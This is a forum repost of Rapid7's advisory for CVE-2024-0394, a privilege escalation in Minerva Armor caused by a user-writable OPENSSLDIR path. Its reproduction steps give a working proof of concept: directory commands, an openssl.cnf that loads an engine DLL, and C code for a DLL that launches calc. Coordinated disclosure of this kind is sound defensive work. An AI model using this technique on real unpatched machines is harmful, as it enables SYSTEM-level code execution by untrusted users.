National Cyber Warfare Foundation (NCWF) Forums


CVE-2024-0394: Rapid7 Minerva Armor Privilege Escalation (FIXED)


0 user ratings
2024-04-03 13:05:11
milo
Red Team (CNA)

 - archive -- 
Rapid7 is disclosing CVE-2024-0394, a privilege escalation vulnerability in Rapid7 Minerva’s Armor product family. The root cause of this vulnerability is Minerva’s implementation of OpenSSL’s OPENSSLDIR parameter, which was set to a path accessible to low-privileged users.

CVE-2024-0394: Rapid7 Minerva Armor Privilege Escalation (FIXED)

Rapid7 is disclosing CVE-2024-0394, a privilege escalation vulnerability in Rapid7 Minerva’s Armor product family. Minerva uses the open-source OpenSSL library for cryptographic functions and to support secure communications. The root cause of this vulnerability is Minerva’s implementation of OpenSSL’s OPENSSLDIR parameter, which was set to a path accessible to low-privileged users (such as C:\git\vcpkg\packages\openssl_x86-windows-static-vs2019-static\openssl.cnf). Rapid7 has assessed this vulnerability as having a CVSSv3 score of 7.8.


Impact


Since Minerva Armor operates as a Windows service, this vulnerability enables any authenticated user to elevate privileges and execute arbitrary code with SYSTEM privileges. A low-privileged attacker can create an openssl.cnf configuration file to load a malicious OpenSSL engine library, resulting in arbitrary code execution as SYSTEM when the service starts.


Credit


Rapid7 would like to thank Will Dormann of Vul Labs for disclosing this vulnerability to us in accordance with Rapid7's vulnerability disclosure policy. We are grateful to Will and the security research community for their work to make software and systems safer for everyone.


Product Description


Minerva Armor technology is a core endpoint security component (Windows only) aimed at preventing evasive malware, ransomware, and advanced cyber attacks. Armor is operated and trusted by SMBs and enterprise organizations around the world across a diversity of sectors and verticals.


Minerva Armor technology was developed by Minerva Labs, which was acquired by Rapid7 in March 2023. Armor is part of a product family that includes Minerva Armor and Rapid7 next-generation antivirus (NGAV). Armor was previously used as an OEM component in Intego AV. Note: The Insight agent is not vulnerable to this issue.


Exploitation


During the Armor 32-bit service startup (MVArmorService32.exe), Armor loads the OpenSSL library. OpenSSL is a library that provides a variety of cryptographic functions. This library has an internal directory tree that is used to locate the configuration file; this directory is called OPENSSLDIR. Inside OPENSSLDIR resides the configuration file openssl.cnf. This is where the privilege escalation opportunity begins.


When the application is dependent on the OpenSSL library, it is necessary to indicate the full path to OPENSSLDIR at compile-time, but at run-time, this path is not necessary. Therefore, it is possible to discover the full path using reverse engineering techniques and tools, such as strings, ProcMon, and others.


If an attacker can place the openssl.cnf file and specify a malicious library for loading, the attacker's code is executed instead. The root cause of this vulnerability lies in the OpenSSL library’s configuration in Minerva, where the OPENSSLDIR parameter was set to a path accessible to low-privileged users, such as C:\git\vcpkg\packages\openssl_x86-windows-static-vs2019-static\openssl.cnf. Since Armor operates as a Windows service, this vulnerability enables any authenticated user to elevate privileges and execute arbitrary code with SYSTEM privileges. A low-privileged user can create the openssl.cnf configuration file mentioned above to load a malicious OpenSSL engine library, resulting in arbitrary code execution as SYSTEM when the service starts.


Below is a ProcMon capture of the Armor service looking for the openssl.cnf file:


CVE-2024-0394: Rapid7 Minerva Armor Privilege Escalation (FIXED)


Steps To Reproduce


All steps are executed as a low-privileged authenticated user:



  1. Create a “C:\git\vcpkg\packages\openssl_x86-windows-static-vs2019-static” directory:

    mkdir “C:\git\vcpkg\packages\openssl_x86-windows-static-vs2019-static”

  2. Create an .cnf file with the following contents:


openssl_conf = openssl_init
[openssl_init]
engines = engine_section
[engine_section]
woot = woot_section
[woot_section]
engine_id = woot
dynamic_path = c:\\danik\\calc.dll
init = 0


  1. Create the c:\danik folder:

    mkdir “C:\danik”

  2. Compile and link a malicious “OpenSSL library” — the code below will run Windows calculator:


#include 
BOOL WINAPI DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpReserved )
{
switch( fdwReason )
{
case DLL_PROCESS_ATTACH:
system("calc");
break;
case DLL_THREAD_ATTACH:
// Do thread-specific initialization.
break;
case DLL_THREAD_DETACH:
// Do thread-specific cleanup.
break;
case DLL_PROCESS_DETACH:
// Perform any necessary cleanup.
break;
}
return TRUE; // Successful DLL_PROCESS_ATTACH.
}


  1. Copy calc.dll from above to the “C:\danik” directory.

  2. Restart the Armor service or the whole machine.


Remediation


To remediate CVE-2024-0394, Minerva customers should update the latest release:



















CustomersRemediated version
Minerva customersArmor version 4.5.5
Minerva Armor OEM customersArmor OEM version 4.5.5

Disclosure Timeline


January 8, 2024: Issue reported to Rapid7 by Will Dormann of Vul Labs

January 9, 2024: Rapid7 acknowledges report

January 11, 2024: Rapid7 reproduces issue, confirms vulnerability

January - February 2024: Rapid7 engineering team develops and tests fix, requests information from partner on potentially vulnerable implementation; partner confirms they are no longer offering vulnerable implementation.

March 12, 2024: Rapid7 contacts reporter to ask whether our fix timeline had been previously communicated

March 19, 2024: Rapid7 assigns CVE, updates reporter on fix readiness, confirms affected/fixed versions. Rapid7 and reporter agree on April 3, 2024 as a coordinated disclosure date.

April 3, 2024: This disclosure; fix released.




Source: Rapid7
Source Link: https://blog.rapid7.com/2024/04/03/cve-2024-0394-rapid7-minerva-armor-privilege-escalation-fixed/


Comments
new comment
Nobody has commented yet. Will you be the first?
 
Forum
Red Team (CNA)



Copyright 2012 through 2024 - National Cyber Warfare Foundation - All rights reserved worldwide.